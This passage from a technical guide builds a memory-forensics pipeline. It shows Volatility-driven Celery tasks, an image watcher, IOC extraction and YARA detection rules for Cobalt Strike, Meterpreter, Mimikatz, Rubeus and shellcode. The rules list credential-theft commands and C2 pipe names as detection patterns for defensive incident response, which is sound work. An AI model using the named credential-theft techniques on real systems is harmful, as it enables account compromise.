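JOIN memory_images AS m ON m.id = i.image_id
GROUP BY i.ioc_type, i.ioc_value
HAVING COUNT(DISTINCT m.hostname) >= 2
ORDER BY host_count DESC, i.ioc_value
"""


def demo_connection() -> sqlite3.Connection:
    """Build a throwaway database with a reduced copy of the schema and fake rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE memory_images (id INTEGER PRIMARY KEY, hostname TEXT);
        CREATE TABLE iocs_extracted (
            id INTEGER PRIMARY KEY, image_id INT, ioc_type TEXT, ioc_value TEXT
        );
    """)
    conn.executemany(
        "INSERT INTO memory_images (id, hostname) VALUES (?, ?)",
        [(1, "DC01"), (2, "WEB01"), (3, "WORKSTATION01")],
    )
    conn.executemany(
        "INSERT INTO iocs_extracted (image_id, ioc_type, ioc_value) VALUES (?, ?, ?)",
        [
            (1, "ip", "203.0.113.10"), (2, "ip", "203.0.113.10"),
            (3, "ip", "203.0.113.10"), (2, "domain", "example.test"),
            (1, "mutex", "Global\\demo"), (3, "mutex", "Global\\demo"),
        ],
    )
    return conn


def shared_iocs(conn: sqlite3.Connection) -> list:
    """Return (ioc_type, ioc_value, host_count) for IOCs seen on two or more hosts."""
    return conn.execute(SHARED_IOC_QUERY).fetchall()


if __name__ == "__main__":
    for ioc_type, ioc_value, host_count in shared_iocs(demo_connection()):
        print(f"{ioc_type:8} {ioc_value:20} seen on {host_count} hosts")
```

An IOC that shows up on three hosts in different tiers is usually a better lead than a high risk score on a single machine, which is why this query is worth running as soon as the first few images have been processed.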
The core pipeline: task definitions and worker logic
The pipeline module defines the Celery tasks and the analysis logic they execute. Each task is self-contained: it receives an image ID, loads the image path from the database, runs the relevant Volatility plugins, and writes the results back to the database. Tasks are chained so each stage automatically triggers the next when it completes.
## pipeline/pipeline.py - Core Celery task definitions
from celery import Celery, chain
import subprocess
import json
import hashlib
import logging
import os
import re
from datetime import datetime
from pathlib import Path
import psycopg2
from psycopg2.extras import Json, execute_values
log = logging.getLogger(__name__)
app = Celery('memory_pipeline',
broker=os.environ.get('CELERY_BROKER_URL', 'redis://localhost:6379/0'))
app.conf.task_routes = {
'pipeline.validate_image': {'queue': 'triage'},
'pipeline.run_triage': {'queue': 'triage'},
'pipeline.run_deep_analysis': {'queue': 'deep_analysis'},
'pipeline.extract_iocs': {'queue': 'deep_analysis'},
'pipeline.generate_report': {'queue': 'reporting'},
}
POSTGRES_URL = os.environ.get('POSTGRES_URL', 'postgresql://analyst:changeme@localhost/memory_analysis')
VOL_CMD = '/opt/vol3-env/bin/vol'
YARA_RULES = '/srv/memory/yara_rules/combined.yar'
IMAGE_DIR = '/srv/memory/landing'
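from contextlib import contextmanager

@contextmanager
def get_db():
    """Yield a connection, commit on success, roll back on error, and always close it.

    psycopg2's own connection context manager ends the transaction but leaves the
    connection open, which leaks one connection per call in a long-running worker.
    """
    conn = psycopg2.connect(POSTGRES_URL)
    try:
        yield conn
        conn.commit()
    except Exception:
        conn.rollback()
        raise
    finally:
        conn.close()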
def run_vol(image_path: str, plugin: str, extra_args: list = None) -> list:
"""Run a Volatility 3 plugin and return parsed JSON results."""
cmd = [VOL_CMD, '-f', image_path, '--renderer', 'json', plugin]
if extra_args:
cmd.extend(extra_args)
result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
if result.returncode != 0:
log.warning(f"Vol plugin {plugin} returned non-zero: {result.stderr[:200]}")
return []
try:
data = json.loads(result.stdout)
return data.get('rows', data) if isinstance(data, dict) else data
except json.JSONDecodeError:
log.error(f"Failed to parse JSON from {plugin}: {result.stdout[:200]}")
return []
@app.task(bind=True, max_retries=3)
def validate_image(self, image_id: int) -> int:
"""Stage 1: Validate image integrity and record metadata."""
try:
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("SELECT image_path FROM memory_images WHERE id = %s", (image_id,))
row = cur.fetchone()
if not row:
raise ValueError(f"Image ID {image_id} not found")
image_path = row[0]
if not Path(image_path).exists():
raise FileNotFoundError(f"Image not found: {image_path}")
# Calculate SHA256
sha256 = hashlib.sha256()
with open(image_path, 'rb') as f:
for chunk in iter(lambda: f.read(65536), b''):
sha256.update(chunk)
digest = sha256.hexdigest()
# Get image size
size_gb = Path(image_path).stat().st_size / (1024**3)
# Update database
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
UPDATE memory_images
SET sha256 = %s, image_size_gb = %s, status = 'validated'
WHERE id = %s
""", (digest, size_gb, image_id))
conn.commit()
log.info(f"Image {image_id} validated: {size_gb:.1f}GB SHA256={digest[:16]}...")
# Trigger next stage
run_triage.delay(image_id)
return image_id
except Exception as exc:
log.error(f"Validation failed for image {image_id}: {exc}")
raise self.retry(exc=exc, countdown=60)
@app.task(bind=True, max_retries=2)
def run_triage(self, image_id: int) -> int:
"""Stage 2: Fast triage - process list, network connections, basic anomalies."""
try:
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("SELECT image_path, hostname FROM memory_images WHERE id = %s", (image_id,))
image_path, hostname = cur.fetchone()
log.info(f"Starting triage for {hostname} (image {image_id})")
# Update status
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("UPDATE memory_images SET status='triage_running' WHERE id=%s", (image_id,))
conn.commit()
# ── Process list ──────────────────────────────────────────────────────
processes = run_vol(image_path, 'windows.pslist')
suspicious_procs = []
proc_records = []
# Known suspicious parent-child relationships
suspicious_pairs = {
('winword.exe', 'cmd.exe'), ('winword.exe', 'powershell.exe'),
('excel.exe', 'cmd.exe'), ('excel.exe', 'powershell.exe'),
('outlook.exe', 'cmd.exe'), ('outlook.exe', 'powershell.exe'),
}
pid_to_name = {}
for proc in processes:
name = (proc.get('ImageFileName') or proc.get('Name') or '').lower()
pid = proc.get('PID') or proc.get('Pid', 0)
ppid = proc.get('PPID') or proc.get('PPid', 0)
pid_to_name[pid] = name
for proc in processes:
name = (proc.get('ImageFileName') or proc.get('Name') or '').lower()
pid = proc.get('PID') or proc.get('Pid', 0)
ppid = proc.get('PPID') or proc.get('PPid', 0)
path = proc.get('Path') or proc.get('Exe') or ''
is_suspicious = False
reason = []
# Check parent-child anomalies
parent_name = pid_to_name.get(ppid, '')
if (parent_name, name) in suspicious_pairs:
is_suspicious = True
reason.append(f"Suspicious parent: {parent_name} spawned {name}")
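# Check for masquerading (system process names running outside System32)
# windows.pslist does not report an image path, so populate `path` from
# windows.cmdline or windows.dlllist output for this check to fire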
if name in ['svchost.exe', 'lsass.exe', 'csrss.exe', 'winlogon.exe']:
if path and 'system32' not in path.lower():
is_suspicious = True
reason.append(f"System process outside System32: {path}")
if is_suspicious:
suspicious_procs.append(pid)
proc_records.append((
image_id, pid, ppid, name, path,
proc.get('CmdLine') or proc.get('CommandLine') or '',
is_suspicious, ', '.join(reason) if reason else None
))
# Bulk insert processes
with get_db() as conn:
with conn.cursor() as cur:
execute_values(cur, """
INSERT INTO process_list
(image_id, pid, ppid, name, path, cmd_line, is_suspicious, suspicious_reason)
VALUES %s
""", proc_records)
conn.commit()
# ── Network connections ───────────────────────────────────────────────
connections = run_vol(image_path, 'windows.netscan')
conn_records = []
suspicious_ports = {4444, 8080, 8443, 1337, 31337, 443, 80}
internal_ranges = ['10.', '192.168.'] + [f'172.{n}.' for n in range(16, 32)]  # full RFC 1918 space (172.16.0.0/12 covers 172.16 to 172.31)
for c in connections:
remote = c.get('ForeignAddr') or c.get('RemoteAddr') or ''
rport = c.get('ForeignPort') or c.get('RemotePort') or 0
pid = c.get('PID') or c.get('Pid') or 0
is_sus = (
pid in suspicious_procs and
not any(remote.startswith(r) for r in internal_ranges)
)
conn_records.append((
image_id, pid,
c.get('ImageFileName') or c.get('Owner') or '',
c.get('LocalAddr') or '', c.get('LocalPort') or 0,
remote, rport,
c.get('State') or '',
is_sus
))
with get_db() as conn:
with conn.cursor() as cur:
execute_values(cur, """
INSERT INTO network_connections
(image_id, pid, process_name, local_addr, local_port,
remote_addr, remote_port, state, is_suspicious)
VALUES %s
""", conn_records)
conn.commit()
# ── Triage summary ────────────────────────────────────────────────────
risk_score = (
len(suspicious_procs) * 10 +
sum(1 for c in conn_records if c[-1]) * 5
)
summary = {
'process_count': len(proc_records),
'suspicious_processes': len(suspicious_procs),
'network_connections': len(conn_records),
'risk_score': risk_score,
}
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
INSERT INTO triage_results
(image_id, process_count, network_conn_count,
suspicious_process_count, risk_score, triage_summary)
VALUES (%s, %s, %s, %s, %s, %s)
""", (image_id, len(proc_records), len(conn_records),
len(suspicious_procs), risk_score, Json(summary)))
cur.execute(
"UPDATE memory_images SET status='triage_complete' WHERE id=%s",
(image_id,)
)
conn.commit()
log.info(f"Triage complete for {hostname}: risk_score={risk_score}")
# Always run deep analysis; priority queue handles ordering
run_deep_analysis.delay(image_id)
return image_id
except Exception as exc:
log.error(f"Triage failed for image {image_id}: {exc}")
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("UPDATE memory_images SET status='triage_failed' WHERE id=%s", (image_id,))
conn.commit()
raise self.retry(exc=exc, countdown=120)
@app.task(bind=True, max_retries=2)
def run_deep_analysis(self, image_id: int) -> int:
"""Stage 3: Deep analysis - malfind, callbacks, handles, Yara scanning."""
try:
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("SELECT image_path, hostname FROM memory_images WHERE id = %s", (image_id,))
image_path, hostname = cur.fetchone()
log.info(f"Starting deep analysis for {hostname} (image {image_id})")
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("UPDATE memory_images SET status='deep_running' WHERE id=%s", (image_id,))
conn.commit()
# ── Malfind ───────────────────────────────────────────────────────────
malfind_results = run_vol(image_path, 'windows.malfind')
malfind_records = []
for region in malfind_results:
pid = region.get('PID') or region.get('Pid') or 0
name = region.get('Process') or region.get('ImageFileName') or ''
protection = region.get('Protection') or ''
vad_start = region.get('Start') or 0
vad_end = region.get('End') or 0
# Check for PE header (MZ)
hexdata = str(region.get('Hexdump') or region.get('Data') or '')
has_pe = hexdata.lower().startswith('4d 5a') or 'MZ' in hexdata
# Entropy is a fixed placeholder; a real value needs the region's raw bytes
entropy = 6.5
# Determine risk
if 'EXECUTE_READ_WRITE' in protection and has_pe:
risk = 'CRITICAL'
elif 'EXECUTE_READ_WRITE' in protection:
risk = 'HIGH'
else:
risk = 'MEDIUM'
malfind_records.append((
image_id, pid, name,
vad_start, vad_end, protection,
has_pe, entropy, None, risk
))
if malfind_records:
with get_db() as conn:
with conn.cursor() as cur:
execute_values(cur, """
INSERT INTO malfind_results
(image_id, pid, process_name, vad_start, vad_end,
protection, has_pe_header, entropy, yara_matches, risk_level)
VALUES %s
""", malfind_records)
conn.commit()
has_malfind = len(malfind_records) > 0
# ── Yara scanning of process memory ───────────────────────────────────
if Path(YARA_RULES).exists():
yara_results = run_vol(image_path, 'windows.vadyarascan',
['--yara-file', YARA_RULES])
for match in yara_results:
log.warning(f"YARA HIT on {hostname}: Rule={match.get('Rule')} "
f"PID={match.get('PID')} Process={match.get('Process')}")
# ── Kernel callbacks ──────────────────────────────────────────────────
callbacks = run_vol(image_path, 'windows.callbacks')
if callbacks:
log.info(f" Callbacks found: {len(callbacks)}")
# Update triage results with malfind flag
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
UPDATE triage_results
SET has_malfind = %s
WHERE image_id = %s
""", (has_malfind, image_id))
cur.execute(
"UPDATE memory_images SET status='deep_complete' WHERE id=%s",
(image_id,)
)
conn.commit()
log.info(f"Deep analysis complete for {hostname}: "
f"{len(malfind_records)} malfind regions")
extract_iocs.delay(image_id)
return image_id
except Exception as exc:
log.error(f"Deep analysis failed for image {image_id}: {exc}")
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("UPDATE memory_images SET status='deep_failed' WHERE id=%s", (image_id,))
conn.commit()
raise self.retry(exc=exc, countdown=180)
@app.task(bind=True)
def extract_iocs(self, image_id: int) -> int:
"""Stage 4: Extract and enrich IOCs from analysis results."""
try:
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("SELECT image_path, hostname FROM memory_images WHERE id = %s", (image_id,))
image_path, hostname = cur.fetchone()
log.info(f"Extracting IOCs for {hostname} (image {image_id})")
ioc_records = []
# Extract IP addresses from network connections
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT DISTINCT remote_addr, remote_port, pid, process_name
FROM network_connections
WHERE image_id = %s AND remote_addr != '' AND remote_addr != '0.0.0.0'
""", (image_id,))
for row in cur.fetchall():
remote_addr, port, pid, pname = row
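# Filter private, loopback and link-local addresses - external IPs are more interesting
# (172.16.0.0/12 covers 172.16 through 172.31, not just 172.16)
private_prefixes = ('10.', '192.168.', '127.', '169.254.', '0.') + tuple(f'172.{n}.' for n in range(16, 32))
if not remote_addr.startswith(private_prefixes):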
ioc_records.append((
image_id, 'ip_address', remote_addr,
pid, pname, 'medium', 'netscan'
))
# Extract strings from malfind regions (URLs, domains, hashes)
# Run strings against each malfind region via bulk_extractor
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT pid, vad_start, vad_end, process_name
FROM malfind_results
WHERE image_id = %s AND risk_level IN ('CRITICAL','HIGH')
LIMIT 20
""", (image_id,))
high_risk_regions = cur.fetchall()
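# Use Volatility strings plugin for URL extraction from memory.
# windows.strings maps entries from a pre-generated strings file (--strings-file)
# to processes, so that file must be produced and passed in for this call to return output.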
strings_result = subprocess.run([
VOL_CMD, '-f', image_path, '--renderer', 'json',
'windows.strings', '--pid',
','.join(str(r[0]) for r in high_risk_regions) if high_risk_regions else '0'
], capture_output=True, text=True, timeout=300)
# Extract URLs and domains from strings output
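# Character class includes ':' and '%' so URLs with explicit ports or encoded paths are not cut short
url_pattern = re.compile(r'https?://[a-zA-Z0-9./_?=&%:#~+-]{10,200}')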
domain_pattern = re.compile(r'\b(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}\b')
for url in url_pattern.findall(strings_result.stdout):
if not any(legit in url for legit in
['microsoft.com', 'windows.com', 'windowsupdate.com']):
ioc_records.append((image_id, 'url', url, None, None, 'medium', 'strings'))
if ioc_records:
with get_db() as conn:
with conn.cursor() as cur:
execute_values(cur, """
INSERT INTO iocs_extracted
(image_id, ioc_type, ioc_value, pid, process_name,
confidence, source_plugin)
VALUES %s
ON CONFLICT DO NOTHING
""", ioc_records)
conn.commit()
log.info(f"IOC extraction complete for {hostname}: {len(ioc_records)} IOCs")
generate_report.delay(image_id)
return image_id
except Exception as exc:
log.error(f"IOC extraction failed for image {image_id}: {exc}")
raise
@app.task(bind=True)
def generate_report(self, image_id: int) -> int:
"""Stage 5: Generate analyst-ready HTML and JSON reports."""
try:
with get_db() as conn:
with conn.cursor() as cur:
# Gather all results
cur.execute("""
SELECT m.hostname, m.image_path, m.image_size_gb, m.sha256,
m.acquired_at, m.os_version, m.tier,
t.process_count, t.network_conn_count,
t.suspicious_process_count, t.risk_score, t.has_malfind
FROM memory_images m
LEFT JOIN triage_results t ON t.image_id = m.id
WHERE m.id = %s
""", (image_id,))
meta = cur.fetchone()
cur.execute("""
SELECT pid, ppid, name, path, cmd_line, suspicious_reason
FROM process_list WHERE image_id = %s AND is_suspicious = TRUE
""", (image_id,))
suspicious_procs = cur.fetchall()
cur.execute("""
SELECT process_name, remote_addr, remote_port, state
FROM network_connections WHERE image_id = %s AND is_suspicious = TRUE
""", (image_id,))
suspicious_conns = cur.fetchall()
cur.execute("""
SELECT pid, process_name, protection, has_pe_header, entropy, risk_level
FROM malfind_results WHERE image_id = %s
ORDER BY risk_level
""", (image_id,))
malfind = cur.fetchall()
cur.execute("""
SELECT ioc_type, ioc_value, process_name, confidence
FROM iocs_extracted WHERE image_id = %s
""", (image_id,))
iocs = cur.fetchall()
hostname = meta[0]
risk_score = meta[10] or 0  # NULL when no triage row exists (LEFT JOIN)
risk_label = (
'CRITICAL' if risk_score >= 50 else
'HIGH' if risk_score >= 20 else
'MEDIUM' if risk_score >= 5 else
'LOW'
)
# JSON report
report_data = {
'hostname': hostname,
'image_id': image_id,
'risk_score': risk_score,
'risk_label': risk_label,
'has_malfind': meta[11],
'suspicious_procs': len(suspicious_procs),
'suspicious_conns': len(suspicious_conns),
'ioc_count': len(iocs),
'iocs': [{'type': i[0], 'value': i[1], 'process': i[2]} for i in iocs],
'malfind_regions': [
{'pid': m[0], 'process': m[1], 'protection': m[2],
'has_pe': m[3], 'risk': m[5]}
for m in malfind
],
}
report_dir = Path(f'/srv/memory/reports/{hostname}')
report_dir.mkdir(parents=True, exist_ok=True)
json_path = report_dir / f'report_{image_id}.json'
with open(json_path, 'w') as f:
json.dump(report_data, f, indent=2, default=str)
with get_db() as conn:
with conn.cursor() as cur:
cur.execute(
"UPDATE memory_images SET status='complete' WHERE id=%s",
(image_id,)
)
conn.commit()
log.info(f"Report generated for {hostname}: risk={risk_label} ({risk_score})")
if risk_label in ('CRITICAL', 'HIGH'):
log.warning(f"HIGH PRIORITY: {hostname} requires immediate analyst review")
return image_id
except Exception as exc:
log.error(f"Report generation failed for image {image_id}: {exc}")
raise
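The malfind stage above stores a fixed placeholder of 6.5 for entropy. A minimal sketch of computing a real value from the plugin's hex output follows. It assumes the field is a string of whitespace-separated two-digit hex bytes, and the helper names `hexdump_to_bytes` and `shannon_entropy` are illustrative rather than part of the pipeline. Volatility returns only a short preview of each region, so treat the result as a rough signal, not the entropy of the whole VAD.

```python
import math
import re
from collections import Counter

# Matches standalone two-digit hex tokens such as "4d" or "5A"
_HEX_BYTE = re.compile(r'\b[0-9a-fA-F]{2}\b')


def hexdump_to_bytes(hexdump: str) -> bytes:
    """Convert whitespace-separated hex byte pairs to raw bytes (assumed input format)."""
    return bytes(int(tok, 16) for tok in _HEX_BYTE.findall(hexdump))


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform data."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())
```

In the malfind loop, the placeholder could then become `entropy = shannon_entropy(hexdump_to_bytes(hexdata))`, provided the hex field really has the format assumed here.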
The image watcher: automatically triggering the pipeline
The pipeline tasks need to be triggered automatically when a new memory image lands in the collection directory. A filesystem watcher daemon monitors the landing zone and starts the processing chain once an image file has been detected and is no longer being written.
## image_watcher.py - Filesystem watcher for automatic pipeline triggering
#!/usr/bin/env python3
"""
Watches the Velociraptor upload directory for new memory images.
Automatically triggers the processing pipeline when a new image lands.
"""
import time
import os
import re
import logging
import psycopg2
from pathlib import Path
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
# pip install watchdog
from pipeline import validate_image # Import Celery task
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s [%(levelname)s] %(message)s',
handlers=[
logging.FileHandler('/srv/memory/logs/watcher.log'),
logging.StreamHandler()
]
)
log = logging.getLogger(__name__)
WATCH_DIR = '/srv/memory/landing'
POSTGRES_URL = os.environ.get('POSTGRES_URL', 'postgresql://analyst:changeme@localhost/memory_analysis')
# Pattern matching Velociraptor-uploaded memory images
# Format: hostname_timestamp.raw, hostname_timestamp.zip or hostname_timestamp.dmp
IMAGE_PATTERN = re.compile(r'^([a-zA-Z0-9_-]+)_(\d+)\.(raw|zip|dmp)$')
class MemoryImageHandler(FileSystemEventHandler):
def __init__(self):
self.processing = set()
def on_closed(self, event):
"""Triggered when a file write is complete (file handle closed)."""
if event.is_directory:
return
self._handle_new_file(event.src_path)
def on_created(self, event):
"""Fallback for systems where on_closed is not supported."""
if event.is_directory:
return
# Wait briefly and check if file is still being written
time.sleep(5)
path = Path(event.src_path)
if not path.exists():
return
# Check file is not growing (transfer complete)
size1 = path.stat().st_size
time.sleep(10)
size2 = path.stat().st_size
if size1 == size2:
self._handle_new_file(event.src_path)
def _handle_new_file(self, filepath: str):
path = Path(filepath)
if path.name in self.processing:
return
match = IMAGE_PATTERN.match(path.name)
if not match:
return
hostname = match.group(1)
timestamp = match.group(2)
log.info(f"New image detected: {path.name} from {hostname}")
self.processing.add(path.name)
try:
# Register in database
with psycopg2.connect(POSTGRES_URL) as conn:
with conn.cursor() as cur:
cur.execute("""
INSERT INTO memory_images (hostname, image_path, status)
VALUES (%s, %s, 'received')
ON CONFLICT DO NOTHING
RETURNING id
""", (hostname, str(path)))
row = cur.fetchone()
conn.commit()
if row:
image_id = row[0]
log.info(f"Registered image {image_id} for {hostname}, starting pipeline")
# Kick off the pipeline
validate_image.delay(image_id)
else:
log.warning(f"Image already registered: {path.name}")
except Exception as e:
log.error(f"Failed to register {path.name}: {e}")
self.processing.discard(path.name)
def main():
log.info(f"Starting image watcher on {WATCH_DIR}")
Path(WATCH_DIR).mkdir(parents=True, exist_ok=True)
handler = MemoryImageHandler()
observer = Observer()
observer.schedule(handler, WATCH_DIR, recursive=False)
observer.start()
log.info("Watcher running. Press Ctrl+C to stop.")
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
if __name__ == '__main__':
main()
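The `on_created` fallback above compares two file sizes taken ten seconds apart, so a transfer that stalls for longer than that could be mistaken for a finished one. A slightly more defensive variant, sketched below under the assumption that polling the file size is acceptable on the landing volume, requires several consecutive unchanged readings and gives up after a timeout. The function name `wait_until_stable` and its default values are illustrative.

```python
import os
import time


def wait_until_stable(path: str, interval: float = 5.0,
                      stable_checks: int = 3, timeout: float = 3600.0) -> bool:
    """Return True once the file size is unchanged for `stable_checks` consecutive polls."""
    deadline = time.monotonic() + timeout
    last_size = -1
    unchanged = 0
    while time.monotonic() < deadline:
        try:
            size = os.path.getsize(path)
        except OSError:
            return False  # file vanished (moved or deleted mid-transfer)
        if size == last_size:
            unchanged += 1
            if unchanged >= stable_checks:
                return True
        else:
            # Size changed (or first reading): restart the stability count
            unchanged = 0
            last_size = size
        time.sleep(interval)
    return False  # still growing when the timeout expired
```

Because this blocks the calling thread, it is better run from a worker thread or a Celery task than directly inside a watchdog event handler.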
Systemd service for the watcher
## /etc/systemd/system/memory-watcher.service
[Unit]
Description=Memory Image Pipeline Watcher
After=network.target docker.service redis.service postgresql.service
Requires=docker.service
[Service]
Type=simple
User=analyst
WorkingDirectory=/srv/memory
ExecStart=/opt/vol3-env/bin/python3 /srv/memory/image_watcher.py
Restart=always
RestartSec=10
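# The script's own FileHandler already writes to /srv/memory/logs/watcher.log;
# sending stdout/stderr to the journal avoids every line appearing twice in that file
StandardOutput=journal
StandardError=journal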
Environment=POSTGRES_URL=postgresql://analyst:changeme@localhost/memory_analysis
Environment=CELERY_BROKER_URL=redis://localhost:6379/0
[Install]
WantedBy=multi-user.target
## Enable and start the watcher
systemctl daemon-reload
systemctl enable memory-watcher
systemctl start memory-watcher
systemctl status memory-watcher
Building a Yara ruleset for memory scanning
Yara rules are the primary mechanism for identifying known malware families and attacker tooling in memory images. The pipeline already calls windows.vadyarascan against each image, but the ruleset it scans against needs to be maintained and compiled correctly to be useful. A poorly maintained Yara ruleset either generates excessive false positives that slow investigation or misses known malware because rules have not been updated. This section covers building a ruleset specifically for memory scanning rather than file scanning, which has different considerations.
Memory scanning Yara rules differ from file scanning rules in two important ways. First, you cannot rely on file-level indicators such as filesize or a file hash, because you are scanning a memory region, not a file. Second, strings often appear decoded in memory even if they were encrypted or obfuscated on disk, which means memory rules can be simpler and more reliable than their file-based equivalents for many malware families.
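To make the second point concrete, the sketch below uses a hypothetical single-byte XOR scheme (real malware uses many different encodings) to show why a plain string match fails against the on-disk bytes but succeeds once the payload has decoded itself in memory. The key and the sample buffer are made up for illustration.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR to every byte (encoding and decoding are the same operation)."""
    return bytes(b ^ key for b in data)


INDICATOR = b"sekurlsa::logonpasswords"
KEY = 0x5A  # hypothetical key, chosen only for this illustration

# What the payload looks like once it is running
plaintext_payload = b"...." + INDICATOR + b"...."

# What a file scanner sees: the same payload, XOR-encoded on disk
on_disk = xor_bytes(plaintext_payload, KEY)

# What a memory scanner sees after the loader has decoded the payload
in_memory = xor_bytes(on_disk, KEY)

print("match on disk:  ", INDICATOR in on_disk)
print("match in memory:", INDICATOR in in_memory)
```

A file rule would need to account for the encoding, while a memory rule can match the plain string directly.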
## Yara rule structure for memory scanning
## Save to /srv/memory/yara_rules/
# rules/cobalt_strike.yar
rule CobaltStrike_Beacon_Config_Decoded {
meta:
description = "Detects decoded Cobalt Strike beacon configuration in memory"
author = "justruss"
date = "2026-01-01"
confidence = "high"
strings:
// BeaconType field prefix in decoded config
$beacon_cfg = { 00 01 00 01 00 00 00 ?? }
// Common C2 URI patterns in decoded beacon memory
$uri_pattern = "/updates" ascii wide
$uri_cdn = "/CDN/" ascii wide
// Sleep mask pattern common across CS versions
$sleep_mask = { C7 44 24 ?? 01 00 00 00 }
// Reflective loader signature
$ref_loader = "ReflectiveLoader" ascii
condition:
($ref_loader and 1 of ($uri_pattern, $uri_cdn))
or ($beacon_cfg and $sleep_mask)
}
rule CobaltStrike_SMB_Beacon {
meta:
description = "Detects Cobalt Strike SMB named pipe beacon in memory"
strings:
$pipe_msse = "\\\\.\\pipe\\MSSE-" wide ascii
$pipe_postex = "\\\\.\\pipe\\postex_" wide ascii
$pipe_msagnt = "\\\\.\\pipe\\msagent_" wide ascii
$pipe_status = "\\\\.\\pipe\\status_" wide ascii
condition:
any of them
}
# rules/meterpreter.yar
rule Meterpreter_Reflective_DLL {
meta:
description = "Detects Meterpreter reflective DLL in process memory"
strings:
$mz = { 4D 5A }
$ref_loader = "ReflectiveLoader" ascii
$meterpreter = "meterpreter" ascii nocase
$stdapi = "stdapi_" ascii
$priv = "priv_elevate" ascii
condition:
$mz at 0 and $ref_loader and 1 of ($meterpreter, $stdapi, $priv)
}
# rules/credential_tools.yar
rule Mimikatz_In_Memory {
meta:
description = "Detects Mimikatz variants loaded in process memory"
strings:
$mimikatz1 = "mimikatz" ascii wide nocase
$mimikatz2 = "sekurlsa::" ascii wide
$mimikatz3 = "lsadump::" ascii wide
$mimikatz4 = "kerberos::" ascii wide
$mimikatz5 = "privilege::debug" ascii wide
$wdigest = "wdigest.dll" ascii wide
$lsasrv = "lsasrv.dll" ascii wide
condition:
2 of ($mimikatz1, $mimikatz2, $mimikatz3, $mimikatz4, $mimikatz5)
or ($wdigest and $lsasrv and 1 of ($mimikatz1, $mimikatz2))
}
rule Rubeus_Kerberos_Tool {
meta:
description = "Detects Rubeus .NET Kerberos toolkit in memory"
strings:
$rubeus1 = "Rubeus" ascii wide
$asktgt = "asktgt" ascii wide
$kerberos = "kerberoast" ascii wide nocase
$asreproast = "asreproast" ascii wide nocase
$s4u = "s4u" ascii wide
condition:
$rubeus1 and 2 of ($asktgt, $kerberos, $asreproast, $s4u)
}
# rules/generic_suspicious.yar
rule RWX_PE_In_Anonymous_Memory {
meta:
description = "PE header in executable anonymous memory - reflective loading"
confidence = "medium"
strings:
$mz = { 4D 5A 90 00 }
$pe = { 50 45 00 00 }
condition:
$mz at 0 and $pe
}
rule Shellcode_Common_Preambles {
meta:
description = "Common shellcode entry patterns in executable memory"
strings:
// x64 NOP sled into shellcode
$nop_sled = { 90 90 90 90 90 90 90 90 FC 48 83 E4 F0 }
// Common x64 shellcode prologue
$x64_prolog = { FC 48 83 E4 F0 E8 C? 00 00 00 }
// Common WinExec shellcode pattern
$winexec = { 6A 01 68 63 6D 64 00 }
condition:
any of them
}
## Yara rule compilation and management script
## Run regularly to rebuild the combined ruleset
#!/usr/bin/env python3
"""
Compiles individual Yara rule files into a single compiled ruleset.
Validates rules before compilation to catch syntax errors.
Tests against known-clean samples to check for false positives.
"""
import yara
import os
import json
import logging
from pathlib import Path
from datetime import datetime
log = logging.getLogger(__name__)
RULES_DIR = Path('/srv/memory/yara_rules/rules')
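# Note: save() writes compiled (binary) rules, not rule source, despite the .yar extension.
# Volatility's --yara-file option expects rule source, so point it at source rules rather than this file.
COMPILED_OUT = Path('/srv/memory/yara_rules/combined.yar')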
CLEAN_SAMPLES = Path('/srv/memory/yara_rules/clean_samples')
def compile_ruleset() -> bool:
"""Compile all .yar files into a single combined ruleset."""
rule_files = {}
errors = []
for yar_file in sorted(RULES_DIR.glob('*.yar')):
namespace = yar_file.stem
try:
# Test compile individually first
yara.compile(filepath=str(yar_file))
rule_files[namespace] = str(yar_file)
log.info(f" OK: {yar_file.name}")
except yara.SyntaxError as e:
log.error(f" SYNTAX ERROR in {yar_file.name}: {e}")
errors.append(str(yar_file.name))
if errors:
log.error(f"Compilation aborted: {len(errors)} files have syntax errors")
return False
# Compile combined ruleset
try:
combined = yara.compile(filepaths=rule_files)
combined.save(str(COMPILED_OUT))
log.info(f"Combined ruleset saved: {COMPILED_OUT}")
log.info(f"Rule files compiled: {len(rule_files)}")
return True
except Exception as e:
log.error(f"Combined compilation failed: {e}")
return False
def test_against_clean_samples(compiled_path: str) -> int:
"""Test compiled ruleset against clean samples. Returns false positive count."""
if not CLEAN_SAMPLES.exists():
log.warning("No clean samples directory - skipping false positive test")
return 0
rules = yara.load(compiled_path)
fp_count = 0
for sample in CLEAN_SAMPLES.glob('*'):
if sample.is_file():
matches = rules.match(str(sample))
if matches:
log.warning(f"FALSE POSITIVE: {sample.name} matched {[m.rule for m in matches]}")
fp_count += 1
log.info(f"False positive check: {fp_count} hits in clean samples")
return fp_count
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO,
format='%(asctime)s [%(levelname)s] %(message)s')
log.info(f"Compiling Yara ruleset from {RULES_DIR}")
if compile_ruleset():
fps = test_against_clean_samples(str(COMPILED_OUT))
if fps > 5:
log.warning(f"High false positive count ({fps}) - review rules before use")
else:
log.info("Ruleset ready for deployment")
else:
log.error("Ruleset compilation failed - keeping previous version")
